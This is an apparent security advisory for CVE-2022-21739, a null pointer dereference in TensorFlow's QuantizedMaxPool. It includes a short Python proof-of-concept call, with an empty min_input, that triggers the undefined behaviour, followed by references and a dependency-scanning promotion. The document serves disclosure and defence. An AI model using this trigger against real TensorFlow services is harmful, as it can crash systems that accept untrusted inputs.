CVE-2022-21739: Null pointer dereference in TensorFlow
(updated )
The implementation of QuantizedMaxPool
has an undefined behavior where user controlled inputs can trigger a reference binding to null pointer.
import tensorflow as tf
tf.raw_ops.QuantizedMaxPool(
input = tf.constant([[[[4]]]], dtype=tf.quint8),
min_input = [],
max_input = [1],
ksize = [1, 1, 1, 1],
strides = [1, 1, 1, 1],
padding = "SAME", name=None
)
References
- github.com/advisories/GHSA-3mw4-6rj6-74g5
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2022-63.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2022-118.yaml
- github.com/tensorflow/tensorflow
- github.com/tensorflow/tensorflow/blob/5100e359aef5c8021f2e71c7b986420b85ce7b3d/tensorflow/core/kernels/quantized_pooling_ops.cc
- github.com/tensorflow/tensorflow/commit/53b0dd6dc5957652f35964af16b892ec9af4a559
- github.com/tensorflow/tensorflow/security/advisories/GHSA-3mw4-6rj6-74g5
- nvd.nist.gov/vuln/detail/CVE-2022-21739
Detect and mitigate CVE-2022-21739 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →